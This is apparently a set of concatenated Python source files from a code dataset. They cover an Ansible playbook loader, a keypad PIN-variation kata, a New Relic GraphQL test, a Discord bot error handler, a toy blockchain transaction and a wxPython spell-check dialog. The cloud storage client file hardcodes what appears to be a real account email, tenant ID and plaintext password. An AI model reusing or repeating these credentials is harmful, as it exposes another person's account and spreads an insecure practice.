callbacks=deps.callbacks,\n runner_callbacks=deps.runner_callbacks,\n check=check,\n extra_vars=extra_vars,\n only_tags=only_tags,\n skip_tags=skip_tags)\n\n @classmethod\n def _setup(cls, playbook, inventory, stats, callbacks, runner_callbacks,\n host_list, limit):\n \"\"\"\n Setup dependencies for the Ansible PlayBook and return them\n in a namedtuple.\n \"\"\"\n deps = collections.namedtuple(\"Dependencies\",\n [\"playbook\", \"inventory\", \"stats\",\n \"callbacks\", \"runner_callbacks\"])\n deps.playbook = playbook\n if stats is None:\n deps.stats = ansible_callbacks.AggregateStats()\n else:\n deps.stats = stats\n if callbacks is None:\n deps.callbacks = ansible_callbacks.PlaybookCallbacks(\n verbose=utils.VERBOSITY)\n else:\n deps.callbacks = callbacks\n if runner_callbacks is None:\n deps.runner_callbacks = ansible_callbacks.PlaybookRunnerCallbacks(\n stats,\n verbose=utils.VERBOSITY)\n else:\n deps.runner_callbacks = runner_callbacks\n if inventory is None:\n deps.inventory = ansible.inventory.Inventory(host_list=host_list)\n if limit:\n PlayBook._setup_inventory_limit(deps.inventory, limit)\n else:\n deps.inventory = inventory\n return deps\n\n @classmethod\n def _setup_inventory_limit(cls, inventory, limit):\n \"\"\"\n Setup and limit hosts using inventory and limit.\n :inventory: Ansible Inventory instance to setup.\n :limit: A dictionary or list of dictionaries limiting the PlayBook.\n Example:\n {\"hostname\": \"server\", \"ip\": \"1.2.3.4\"}\n or\n [{\"hostname\": \"server1\", \"ip\": \"1.2.3.4\"},\n {\"hostname\": \"server2\", \"ip\": \"1.2.3.5\"}]\n \"\"\"\n if isinstance(limit, dict):\n inventory.subset(limit[\"hostname\"])\n PlayBook._setup_host(inventory, limit)\n elif isinstance(limit, collections.Iterable):\n hostnames = \",\".join([l[\"hostname\"] for l in limit])\n inventory.subset(hostnames)\n for l in limit:\n PlayBook._setup_host(inventory, l)\n\n @classmethod\n def _setup_host(cls, inventory, limit):\n \"\"\"\n Check host and setup variables so limit/subset behaves\n as expected.\n \"\"\"\n host = inventory.get_host(limit[\"hostname\"])\n if host and host.vars:\n 
host.vars[\"ansible_ssh_host\"] = limit[\"ip\"]\n else:\n raise Exception(\"The host (%s) is not in the \"\n \"Ansible inventory file %s.\" %\n (host, inventory.host_list))\n\n\ndef _get_files(directory):\n files = []\n directories = list(os.walk(directory))\n directories.sort(cmp=operator.lt)\n for d in directories:\n a_dir = d[0]\n files_in_dir = d[2]\n files_in_dir.sort()\n if os.path.isdir(a_dir) and \"playbooks\" in a_dir:\n for f in files_in_dir:\n if os.path.splitext(f)[1] == \".yml\":\n files.append(os.path.join(a_dir, f))\n return files\n\n\ndef get_playbooks(directory, **kwargs):\n \"\"\"\n Walk the Directory structure and return an ordered list of\n playbook objects.\n\n :directory: The directory to walk and search for playbooks.\n :kwargs: The keywords that will be passed to the PlayBook.factory method.\n\n Notes: * Playbook files are identified as ending in .yml\n * Playbooks are created using the same **kwargs.\n * Playbooks are not run.\n * Playbook files use the .yml file extension.\n \"\"\"\n return [PlayBook.factory(pb, **kwargs) for pb in _get_files(directory)]\n","sub_path":"subspace/playbook.py","file_name":"playbook.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"12716653","text":"'''\nAlright, detective, one of our colleagues successfully observed our target person, Robby the robber. \nWe followed him to a secret warehouse, where we assume to find all the stolen stuff. The door to this warehouse is secured by an electronic combination lock. \nUnfortunately our spy isn't sure about the PIN he saw, when Robby entered it.\n\nThe keypad has the following layout:\n\n┌───┬───┬───┐\n│ 1 │ 2 │ 3 │\n├───┼───┼───┤\n│ 4 │ 5 │ 6 │\n├───┼───┼───┤\n│ 7 │ 8 │ 9 │\n└───┼───┼───┘\n │ 0 │\n └───┘\nHe noted the PIN 1357, but he also said, it is possible that each of the digits he saw could actually be another adjacent digit (horizontally or vertically, but not diagonally).\nE.g. instead of the 1 it could also be the 2 or 4. And instead of the 5 it could also be the 2, 4, 6 or 8.\n\nHe also mentioned, he knows this kind of locks. You can enter an unlimited amount of wrong PINs, they never finally lock the system or sound the alarm. \nThat's why we can try out all possible (*) variations.\n\n* possible in sense of: the observed PIN itself and all variations considering the adjacent digits\n\nCan you help us to find all those variations? It would be nice to have a function, that returns an array (or a list in Java and C#) \nof all variations for an observed PIN with a length of 1 to 8 digits.\nWe could name the function getPINs (get_pins in python, GetPINs in C#). \nBut please note that all PINs, the observed one and also the results, must be strings, because of potentially leading '0's. \nWe already prepared some test cases for you.\n\nDetective, we are counting on you!\n'''\n\nimport itertools # allows us to iterate through all combinations of given lists of numbers\n\ndef get_pins(observed): # Creating a dictionary to give list of all the possible values when a single number is pressed.\n PINdict = {'1': ['1','2','4'],\n '2': ['2','1','3','5'],\n '3': ['3','2','6'],\n '4': ['4','1','5','7'],\n '5': ['5','2','4','6','8'],\n '6': ['6','3','5','9'],\n '7': ['7','4','8'],\n '8': ['8','5','7','9','0'],\n '9': ['9','6','8'],\n '0': ['0','8']\n }\n x = [PINdict[i] for i in observed] # Generates a list of the PINdict.value() for each character in observed. i.e. 
if obs contains '1', list will include ['1', '2', '4'].\n combinations = list(itertools.product(*x)) # Generate list of all combinations of every index in x (*x).\n PINS = [''.join(x) for x in combinations] # Joins strings to make one list of pins.\n return PINS\n","sub_path":"GetPins.py","file_name":"GetPins.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"244695086","text":"import asyncio\nimport pytest\nfrom testing_support.fixtures import (\n dt_enabled,\n validate_transaction_metrics,\n)\nfrom testing_support.validators.validate_span_events import validate_span_events\nfrom newrelic.api.background_task import background_task\n\nfrom test_application import is_graphql_2\n\n\n@pytest.fixture(scope=\"session\")\ndef graphql_run_async():\n from graphql import graphql, __version__ as version\n\n major_version = int(version.split(\".\")[0])\n if major_version == 2:\n\n def graphql_run(*args, **kwargs):\n return graphql(*args, return_promise=True, **kwargs)\n\n return graphql_run\n else:\n return graphql\n\n\n@dt_enabled\ndef test_query_and_mutation_async(app, graphql_run_async, is_graphql_2):\n from graphql import __version__ as version\n\n FRAMEWORK_METRICS = [\n (\"Python/Framework/GraphQL/%s\" % version, 1),\n ]\n _test_mutation_scoped_metrics = [\n (\"GraphQL/resolve/GraphQL/storage\", 1),\n (\"GraphQL/resolve/GraphQL/storage_add\", 1),\n (\"GraphQL/operation/GraphQL/query//storage\", 1),\n (\"GraphQL/operation/GraphQL/mutation//storage_add\", 1),\n ]\n _test_mutation_unscoped_metrics = [\n (\"OtherTransaction/all\", 1),\n (\"GraphQL/all\", 2),\n (\"GraphQL/GraphQL/all\", 2),\n (\"GraphQL/allOther\", 2),\n (\"GraphQL/GraphQL/allOther\", 2),\n ] + _test_mutation_scoped_metrics\n\n _expected_mutation_operation_attributes = {\n \"graphql.operation.type\": \"mutation\",\n \"graphql.operation.name\": \"\",\n }\n _expected_mutation_resolver_attributes = {\n \"graphql.field.name\": \"storage_add\",\n \"graphql.field.parentType\": \"Mutation\",\n \"graphql.field.path\": \"storage_add\",\n \"graphql.field.returnType\": \"[String]\" if is_graphql_2 else \"String\",\n }\n _expected_query_operation_attributes = {\n \"graphql.operation.type\": \"query\",\n \"graphql.operation.name\": \"\",\n }\n _expected_query_resolver_attributes = {\n \"graphql.field.name\": \"storage\",\n \"graphql.field.parentType\": \"Query\",\n \"graphql.field.path\": \"storage\",\n \"graphql.field.returnType\": \"[String]\",\n }\n\n @validate_transaction_metrics(\n \"query//storage\",\n \"GraphQL\",\n scoped_metrics=_test_mutation_scoped_metrics,\n rollup_metrics=_test_mutation_unscoped_metrics + FRAMEWORK_METRICS,\n background_task=True,\n )\n @validate_span_events(exact_agents=_expected_mutation_operation_attributes)\n @validate_span_events(exact_agents=_expected_mutation_resolver_attributes)\n @validate_span_events(exact_agents=_expected_query_operation_attributes)\n @validate_span_events(exact_agents=_expected_query_resolver_attributes)\n @background_task()\n def _test():\n async def coro():\n response = await graphql_run_async(\n app, 'mutation { storage_add(string: \"abc\") }'\n )\n assert not response.errors\n response = await graphql_run_async(app, \"query { storage }\")\n assert not response.errors\n\n # These are separate assertions because pypy stores 'abc' as a unicode string while other Python versions do not\n assert \"storage\" in str(response.data)\n assert \"abc\" in str(response.data)\n\n loop = 
asyncio.get_event_loop()\n loop.run_until_complete(coro())\n\n _test()\n","sub_path":"tests/framework_graphql/test_application_async.py","file_name":"test_application_async.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"404494184","text":"# -*- coding: utf-8 -*-\nimport collections\nimport datetime\nimport json\nimport logging\nimport traceback\n\nimport discord\nimport typing\nfrom discord.ext import commands as commands\n\nfrom cogs.helpers import api\nfrom cogs.helpers import context, checks\nfrom cogs.helpers.cache import Cache\nfrom cogs.helpers.converters import NotStrongEnough, HierarchyError\nfrom cogs.helpers.guild_settings import Settings\n\n\nclass BamboBot(commands.AutoShardedBot):\n def __init__(self, command_prefix: typing.Union[str, typing.Callable[[discord.Message], typing.Awaitable]], base_logger: logging.Logger, logger: logging.Logger, **options):\n super().__init__(command_prefix, **options)\n\n self.cache = Cache(self)\n self.commands_used = collections.Counter()\n self.admins = [381243923131138058]\n self.base_logger, self.logger = base_logger, logger\n\n # Load credentials so they can be used later\n with open(\"credentials.json\", \"r\", encoding='utf-8') as f:\n credentials = json.load(f)\n\n self.token = credentials[\"discord_token\"]\n\n self.uptime = datetime.datetime.utcnow()\n\n self.api = api.Api(self)\n\n self.settings = Settings(self)\n\n async def on_message(self, message):\n if message.author.bot:\n return # ignore messages from other bots\n\n ctx = await self.get_context(message, cls=context.CustomContext)\n if ctx.prefix is not None:\n await self.invoke(ctx)\n\n async def on_command(self, ctx):\n self.commands_used[ctx.command.name] += 1\n ctx.logger.info(f\"<{ctx.command}> {ctx.message.clean_content}\")\n\n async def on_ready(self):\n game = discord.Game(name=f\"b!help | b!urls\")\n await self.change_presence(status=discord.Status.online, activity=game)\n self.logger.info(\"We are all set, on_ready was fired! Yeah!\")\n total_members = len(self.users)\n self.logger.info(f\"I see {len(self.guilds)} guilds, and {total_members} members\")\n\n async def on_command_error(self, context: context.CustomContext, exception):\n # print(f'self -> {self}\\n')\n # print(f'context -> {context}\\n')\n # print(f'exception -> {exception}\\n')\n # print(f'exception -> {''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n')\n # print(f'exception -> {exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n')\n\n if isinstance(exception, discord.ext.commands.errors.CommandNotFound):\n return\n\n context.logger.debug(f\"Error during processing: {exception} ({repr(exception)})\")\n\n if isinstance(exception, discord.ext.commands.errors.MissingRequiredArgument):\n await context.send_to(f\":x: Brakuje wymaganego argumentu.\\nUżycie : `{context.prefix}{context.command.signature}`\", delete_after=60)\n await context.message.delete(delay=60)\n\n return\n elif isinstance(exception, checks.NoPermissionsError):\n await context.send_to(f\":x: Oof, wystąpił problem! \"\n f\"Bot wymaga więcej permisji. Skontaktuj się w ten sprawie z adminstratorem serwera. \"\n f\"Jeżeli jesteś administratorem, wpisz `{context.prefix}bot_permissions_check` aby zobaczyć brakkujące permisje. 
\"\n f\"Pamiętaj o sprawdzeniu nadpisań kanału\")\n return\n elif isinstance(exception, checks.PermissionsError):\n await context.send_to(f\":x: Heh, nie masz wymaganych uprawnień do tej komendy! \"\n f\"Twój poziom to `{exception.current}`, a wymagany `{exception.required}` :(\", delete_after=60)\n await context.message.delete(delay=60)\n return\n # elif isinstance(exception, discord.ext.commands.errors.CheckFailure):\n # return\n elif isinstance(exception, discord.ext.commands.errors.ConversionError):\n if isinstance(exception.original, NotStrongEnough):\n await context.send_to(f\":x: Nawet jeżeli posiadasz wymmagany poziom do tej komendy, nie możesz celować \"\n f\"w kogoś z wyższym/takim samym poziomem jak twój :(\"\n f\"```{exception.original}```\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception.original, HierarchyError):\n await context.send_to(f\":x: Masz wymagany poziom do tej komendy, ale nie mogę tago wykonać, \"\n f\"ponieważ twój cel jest wyżej ode mnie. Aby to naprawić, przenieś moją rolę \"\n f\"na samą górę listy ról serwera\"\n f\"```{exception.original}```\")\n return\n elif isinstance(exception, discord.ext.commands.errors.BadArgument):\n await context.send_to(f\":x: Jeden z argumentów jest niepoprawny: \\n\"\n f\"**{exception}**\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.ArgumentParsingError):\n await context.send_to(f\":x: Wystąpił problem podczas analizowania komendy, upewnij się, że wszystkie czudzysłowy są poprawne: \\n\"\n f\"**{exception}**\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.BadUnionArgument):\n await context.send_to(f\":x: Wystąpił problem podczas analizowania arugmentów, upewnij się, że są one poprawnego typu: \\n\"\n f\"**{exception}**\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.CommandOnCooldown):\n if context.message.author.id in [381243923131138058]:\n await context.reinvoke()\n return\n else:\n\n await context.send_to(\"Jesteś na cooldown'ie :(, spróbuj ponownie za {seconds} sekund\".format(\n seconds=round(exception.retry_after, 1)), delete_after=60)\n return\n elif isinstance(exception, discord.ext.commands.errors.TooManyArguments):\n await context.send_to(f\":x: Dałeś mi za dużo argumentów. Być może powinieneś użyć cudzysłowów.\\nUżyj komendy tak : `{context.prefix}{context.command.signature}`\", delete_after=60)\n await context.message.delete(delay=60)\n return\n elif isinstance(exception, discord.ext.commands.NoPrivateMessage):\n await context.send_to('Ta komenda nie może zostać wykonana w wiadomości prywatnej.')\n return\n elif isinstance(exception, discord.ext.commands.errors.CommandInvokeError):\n # await context.author.send(f\"Przepraszam, wystąpił błąd podczas przetwarzania twojej komendy. \"\n # f\"Sprawdź uprawnienia bota i spróbuj ponownie. 
Aby zgłosić bug, wyślij deweloperowi co następuje: ```py\\n{exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n```\", delete_after=3600)\n # print(f'{exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n')\n self.logger.error(f'Exeption in command {context.command}')\n try:\n self.logger.error(''.join(traceback.format_exception(type(exception), exception, exception.__traceback__)))\n except Exception as ex:\n self.logger.error(exception)\n try:\n await context.author.send(f\"Przepraszam, wystąpił błąd podczas przetwarzania twojej komendy. \"\n f\"Sprawdź uprawnienia bota i spróbuj ponownie. Aby zgłosić bug, zgłoś na Serwerze Wsparcia co następuje: ```py\\n{exception}\\n{''.join(traceback.format_exception(type(exception), exception, exception.__traceback__))}\\n```\", delete_after=3600)\n except discord.HTTPException:\n await context.author.send(f\"Przepraszam, wystąpił błąd podczas przetwarzania twojej komendy. \"\n f\"Sprawdź uprawnienia bota i spróbuj ponownie. Aby zgłosić bug, zgłoś na Serwerze Wsparcia co następuje: ```py\\n{exception}\\n```\", delete_after=3600)\n finally:\n await context.message.delete(delay=3600)\n return\n elif isinstance(exception, discord.ext.commands.errors.NotOwner):\n return # Jsk uses this\n else:\n self.logger.error('Ignoring exception in command {}:'.format(context.command))\n self.logger.error(\"\".join(traceback.format_exception(type(exception), exception, exception.__traceback__)))\n\n\nasync def get_prefix(bot: BamboBot, message: discord.Message):\n forced_prefixes = ['b!', 'B!', '!b', '!B']\n\n if not message.guild:\n return commands.when_mentioned_or(*forced_prefixes)(bot, message)\n\n prefix_set = await bot.settings.get(message.guild, \"bot_prefix\")\n extras = [prefix_set] + forced_prefixes\n\n return commands.when_mentioned_or(*extras)(bot, message)\n","sub_path":"cogs/helpers/BamboBot.py","file_name":"BamboBot.py","file_ext":"py","file_size_in_byte":9460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"282481308","text":"from customTypes.transaction import TxIn, TxOut, Transaction, blockReward\nfrom crypto import sha256, signTx\nimport json\n\n\ndef createCoinbaseTx(myKey, blockLevel):\n txIn = TxIn(\n txOutId=\"0\",\n txOutIdx=blockLevel\n )\n txIns = [txIn]\n\n txOut = TxOut(\n address=myKey,\n amount=blockReward\n )\n txOuts = [txOut]\n txId = sha256(json.dumps([txIns, txOuts]))\n\n return Transaction(\n txIns=txIns,\n txOuts=txOuts,\n txId=txId,\n signature=signTx(txId)\n )\n","sub_path":"src/ch3/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"395632035","text":"import requests\nfrom django.http import HttpResponse, Http404\n\n\ndef get_token():\n auth_url = 'https://api-compute.cloud.toast.com/identity/v2.0'\n tenant_id = '2426bc68736b4ca186199174c5d570bc'\n username = 'gwngus3922@gmail.com'\n password = 'qpsej0424'\n token_url = auth_url + '/tokens'\n req_header = {'Content-Type': 'application/json'}\n req_body = {\n 'auth': {\n 'tenantId': tenant_id,\n 'passwordCredentials': {\n 'username': username,\n 'password': password\n }\n }\n }\n\n response = requests.post(token_url, headers=req_header, json=req_body)\n return response.json()\n\n\nclass ContainerService:\n account = 'AUTH_2426bc68736b4ca186199174c5d570bc'\n url = ''\n token_id = 
''\n\n def __init__(self, url, token_id):\n self.url = url\n self.token_id = token_id\n\n def _get_url(self, container, object_name):\n return self.url + self.account + '/' + container + '/' + object_name\n\n def _get_request_header(self):\n return {'X-Auth-Token': self.token_id}\n\n def upload(self, container, object, file):\n req_url = self._get_url(container, object)\n req_header = self._get_request_header()\n\n requests.put(req_url, headers=req_header, data=file)\n\n def delete(self, container, object):\n req_url = self._get_url(container, object)\n req_header = self._get_request_header()\n requests.delete(req_url, headers=req_header)\n\n def download(self, container, object_name):\n req_url = self._get_url(container, object_name)\n req_header = self._get_request_header()\n # print(req_url)\n response = requests.get(req_url, headers=req_header)\n\n if response.status_code == 200:\n deliver_response = HttpResponse(content_type='video/mp4')\n # force browser to download file\n deliver_response['Content-Disposition'] = 'attachment; filename=%s' % object_name\n deliver_response.write(response.content)\n else:\n raise Http404\n\n return deliver_response\n\n def get_image_and_video_files_download_url(self, id, vm_no, object_list):\n url_list = []\n idx = 0\n idx2 = 0\n idx3 = 0\n idx4 = 0\n for object in object_list:\n if vm_no in object and \"ProductImages\" in object and \".\" in object:\n tmp_json = {\"ProductImages%d\" % idx: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx += 1\n elif vm_no in object and \"ProductDetailImages\" in object and \".\" in object:\n tmp_json = {\"ProductDetailImages%d\" % idx2: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx2 += 1\n elif vm_no in object and \"PromotionVideos\" in object and \".\" in object:\n tmp_json = {\"PromotionVideos%d\" % idx3: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx3 += 1\n elif vm_no in object and \"VideosThumbnail\" in object and \".\" in object:\n tmp_json = {\"VideosThumbnail%d\" % idx4: self._get_url(id, object)}\n url_list.append(tmp_json)\n idx4 += 1\n\n return url_list","sub_path":"app/toast.py","file_name":"toast.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"280207715","text":"from zoundry.appframework.ui.widgets.dialog import ZBaseDialog\r\nfrom zoundry.base.util.text.textutil import getNoneString\r\nfrom zoundry.blogapp.messages 
import _extstr\r\nfrom zoundry.appframework.ui.dialogs.mixins import ZPersistentDialogMixin\r\nfrom zoundry.blogapp.constants import IZBlogAppUserPrefsKeys\r\nimport wx\r\n\r\n\r\n# ---------------------------------------------------------------------------------------\r\n# The standard modal dialog used for spell check\r\n# ---------------------------------------------------------------------------------------\r\nclass ZSpellCheckDialog(ZBaseDialog, ZPersistentDialogMixin):\r\n\r\n def __init__(self, parent, spellCheckModel):\r\n self.spellCheckModel = spellCheckModel\r\n ZBaseDialog.__init__(self, parent,wx.ID_ANY, _extstr(u\"spellcheckdialog.DialogTitle\"), size = wx.Size(350, 340), style =wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER, name = u\"ZSpellCheckDialog\") #$NON-NLS-1$ #$NON-NLS-2$\r\n ZPersistentDialogMixin.__init__(self, IZBlogAppUserPrefsKeys.SPELLCHECK_DIALOG, False, True)\r\n # end __init__()\r\n\r\n def _getButtonTypes(self):\r\n return ZBaseDialog.CLOSE_BUTTON\r\n # end _getButtonTypes()\r\n\r\n def _createContentWidgets(self):\r\n\r\n self.misspellLabel = wx.StaticText(self, -1,_extstr(u\"spellcheckdialog.MisspellWord\") + u\":\", size=wx.Size(-1,20)) #$NON-NLS-1$ #$NON-NLS-2$\r\n self.replaceLabel = wx.StaticText(self, -1,_extstr(u\"spellcheckdialog.ReplaceWith\") + u\":\", size=wx.Size(-1,20)) #$NON-NLS-1$ #$NON-NLS-2$\r\n self.suggestLabel = wx.StaticText(self, -1,_extstr(u\"spellcheckdialog.Suggestions\") + u\":\", size=wx.Size(-1,20)) #$NON-NLS-1$ #$NON-NLS-2$\r\n\r\n self.ignoreBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.Ignore\")) #$NON-NLS-1$\r\n self.ignoreAllBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.IgnoreAll\")) #$NON-NLS-1$\r\n self.addBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.Add\")) #$NON-NLS-1$\r\n self.replaceBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.Replace\")) #$NON-NLS-1$\r\n self.replaceAllBtn = wx.Button(self, -1, _extstr(u\"spellcheckdialog.ReplaceAll\")) #$NON-NLS-1$\r\n\r\n self.replacewordCntrl = wx.TextCtrl(id=wx.NewId(), parent=self, size=wx.Size(-1,20), style=wx.TE_PROCESS_ENTER)\r\n self.suggestionsCntrl = wx.ListBox(id=wx.NewId(), parent=self, style=wx.LB_SINGLE|wx.LB_HSCROLL|wx.LB_NEEDED_SB)\r\n\r\n self.mispellwordCntrl = wx.TextCtrl(id=wx.NewId(), parent=self, style=wx.TE_MULTILINE|wx.TE_RICH2)\r\n\r\n # end _createContentWidgets()\r\n\r\n def _populateContentWidgets(self):\r\n self._setSpellCheckResult( self.spellCheckModel.getSpellCheckResult() )\r\n # end _populateContentWidgets()\r\n\r\n def _layoutContentWidgets(self):\r\n # empty label as a filler\r\n filler1 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n filler3 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n filler4 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n filler5 = wx.StaticText(self,-1,label=u' ',size=wx.Size(-1,20)) #$NON-NLS-1$\r\n\r\n # layout ignore, ignoreall, add vertically in a panel.\r\n buttonSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n buttonSizer1.Add(self.ignoreBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n buttonSizer1.Add(self.ignoreAllBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n buttonSizer1.Add(self.addBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n\r\n # layout replace and replaceall vertically in a panel.\r\n buttonSizer2 = wx.BoxSizer(wx.VERTICAL)\r\n buttonSizer2.Add(self.replaceBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n buttonSizer2.Add(self.replaceAllBtn, 0, wx.ALIGN_LEFT |wx.ALL, 2)\r\n\r\n # layout all in a 2col x 6row flex grid.\r\n sizer = 
wx.FlexGridSizer(6,2,4,4)\r\n sizer.AddGrowableCol(0)\r\n # margin:\r\n m = 8\r\n # row 1: label\r\n sizer.AddMany([\r\n (self.misspellLabel, 1, wx.ALIGN_LEFT | wx.ALIGN_BOTTOM | wx.LEFT | wx.TOP, m),\r\n (filler1, 0,wx.ALIGN_LEFT| wx.RIGHT, m)\r\n ])\r\n\r\n # row 2: misspell word control and button panel 1\r\n sizer.AddMany([\r\n (self.mispellwordCntrl, 1, wx.ALIGN_LEFT | wx.ALIGN_TOP | wx.EXPAND| wx.LEFT, m),\r\n (buttonSizer1, 0,wx.ALIGN_LEFT | wx.EXPAND| wx.RIGHT, m)\r\n ])\r\n\r\n # row 3: label\r\n sizer.AddMany([\r\n (self.replaceLabel, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL| wx.EXPAND| wx.LEFT | wx.TOP, m),\r\n (filler3, 0,wx.ALIGN_LEFT| wx.RIGHT, m)\r\n ])\r\n\r\n # row 4: replace text control\r\n sizer.AddMany([\r\n (self.replacewordCntrl, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL| wx.EXPAND| wx.LEFT, m),\r\n (filler4, 0,wx.ALIGN_LEFT| wx.RIGHT, m)\r\n ])\r\n\r\n # row 5: label\r\n sizer.AddMany([\r\n (self.suggestLabel, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL| wx.EXPAND| wx.LEFT | wx.TOP, m),\r\n (filler5, 0,wx.ALIGN_LEFT | wx.RIGHT, m)\r\n ])\r\n\r\n # row 6: suggestions control and button panel 2\r\n sizer.AddMany([\r\n (self.suggestionsCntrl, 1, wx.ALIGN_LEFT | wx.ALIGN_CENTER_VERTICAL | wx.EXPAND| wx.LEFT, m),\r\n (buttonSizer2, 0,wx.ALIGN_LEFT | wx.EXPAND| wx.RIGHT, m)\r\n ])\r\n\r\n return sizer\r\n # end _layoutContentWidgets()\r\n\r\n def _bindWidgetEvents(self):\r\n self.Bind(wx.EVT_BUTTON, self.onIgnore, self.ignoreBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onIgnoreAll, self.ignoreAllBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onAddWord, self.addBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onReplace, self.replaceBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onReplaceAll, self.replaceAllBtn)\r\n\r\n self.Bind(wx.EVT_TEXT_ENTER, self.onReplaceWordEnterPressed, self.replacewordCntrl)\r\n self.Bind(wx.EVT_CHAR, self.onReplaceWordKeyPressed, self.replacewordCntrl)\r\n self.Bind(wx.EVT_LISTBOX, self.onSuggestionListSelection, self.suggestionsCntrl)\r\n self.Bind(wx.EVT_LISTBOX_DCLICK, self.onSuggestionListDoubleClick, self.suggestionsCntrl)\r\n # end _bindWidgetEvents()\r\n\r\n def _doCheckNextWord(self):\r\n spellCheckResult = self.spellCheckModel.checkNextWord()\r\n self._setSpellCheckResult(spellCheckResult)\r\n # end _doNextCheck()\r\n\r\n def _setSpellCheckResult(self, spellCheckResult):\r\n if spellCheckResult and spellCheckResult.isFinished():\r\n self.Close()\r\n return\r\n self._updateUI(spellCheckResult)\r\n # end _setSpellCheckResult()\r\n\r\n def _updateUI(self, spellCheckResult):\r\n # update UI given IZSpellCheckResult (which could be None)\r\n self._updateMisspelledWordUI(spellCheckResult)\r\n self._updateSuggestionListUI(spellCheckResult)\r\n self._updateReplaceButtonsState()\r\n # end _updateUI()\r\n\r\n def _updateMisspelledWordUI(self, spellCheckResult):\r\n self.mispellwordCntrl.Clear()\r\n if not spellCheckResult:\r\n return\r\n (sentence, startPos, endPos)= self.spellCheckModel.getMisspelledWordData(spellCheckResult)\r\n self.mispellwordCntrl.SetValue(sentence)\r\n if startPos >= 0 and endPos > 0 and endPos > startPos:\r\n self.mispellwordCntrl.SetStyle(startPos, endPos, wx.TextAttr(u\"RED\", u\"YELLOW\")) #$NON-NLS-1$ #$NON-NLS-2$\r\n # _updateMisspelledWordUI()\r\n\r\n def _updateSuggestionListUI(self, spellCheckResult):\r\n self.replacewordCntrl.Clear()\r\n self.suggestionsCntrl.Clear()\r\n if not spellCheckResult:\r\n return\r\n\r\n sList = self.spellCheckModel.getSuggestions(spellCheckResult)\r\n self.suggestionsCntrl.InsertItems(sList,0)\r\n if len(sList) > 
0:\r\n self.replacewordCntrl.SetValue(sList[0])\r\n self.replacewordCntrl.SetSelection(-1,-1)\r\n self.suggestionsCntrl.SetSelection(0,True)\r\n # end _updateSuggestionListUI()\r\n\r\n def _updateReplaceButtonsState(self):\r\n enable = self.suggestionsCntrl.GetCount() > 0 or getNoneString( self.replacewordCntrl.GetValue()) is not None\r\n self.replaceBtn.Enable(enable)\r\n self.replaceAllBtn.Enable(enable)\r\n self.suggestionsCntrl.Enable(self.suggestionsCntrl.GetCount() > 0)\r\n # end _updateReplaceButtonsState()\r\n\r\n def _doReplace(self, replaceAll):\r\n word = getNoneString( self.replacewordCntrl.GetValue())\r\n if word:\r\n self.spellCheckModel.replace(word, replaceAll)\r\n self._doCheckNextWord()\r\n # end _doReplace()\r\n\r\n def _doIgnore(self, ignoreAll):\r\n self.spellCheckModel.ignore(ignoreAll)\r\n self._doCheckNextWord()\r\n # end _doReplace()\r\n\r\n def onIgnore(self, event): #@UnusedVariable\r\n self._doIgnore(False)\r\n # end onIgnore\r\n\r\n def onIgnoreAll(self, event): #@UnusedVariable\r\n self._doIgnore(True)\r\n # end onIgnoreAll\r\n\r\n def onAddWord(self, event): #@UnusedVariable\r\n self.spellCheckModel.addWord()\r\n self._doCheckNextWord()\r\n # end onAddWord\r\n\r\n def onReplace(self, event): #@UnusedVariable\r\n self._doReplace(False)\r\n # end onReplace\r\n\r\n def onReplaceAll(self, event): #@UnusedVariable\r\n self._doReplace(True)\r\n # end onReplaceAll\r\n\r\n def onReplaceWordEnterPressed(self, event):\r\n self.onReplace(event)\r\n # end onReplaceWordEnterPressed\r\n\r\n def onReplaceWordKeyPressed(self, event): #@UnusedVariable\r\n self._updateReplaceButtonsState()\r\n # end 